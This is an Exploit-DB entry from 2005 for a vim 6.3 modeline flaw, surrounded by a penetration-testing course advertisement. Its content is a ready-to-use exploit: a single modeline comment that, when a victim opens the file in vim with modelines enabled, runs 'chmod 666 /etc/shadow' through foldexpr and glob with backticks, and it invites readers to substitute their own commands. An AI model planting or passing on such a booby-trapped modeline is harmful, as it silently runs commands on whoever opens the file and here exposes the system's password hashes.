vim 6.3 < 6.3.082 - 'modlines' Local Command Execution

EDB-ID:

1119

CVE:

N/A




Platform:

Multiple

Date:

2005-07-25


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

1) open up a text file.

2) insert at the top the information (below).

/* vim: foldmethod=expr:foldexpr=glob("`chmod\ 666\ /etc/shadow`") */

3) if modlines = on anyone that opens the file with vim will execute the command:
   chmod 666 /etc/shadow
   
Have fun making your own commands.

The advisory can be found at:
  http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html

/str0ke

# milw0rm.com [2005-07-25]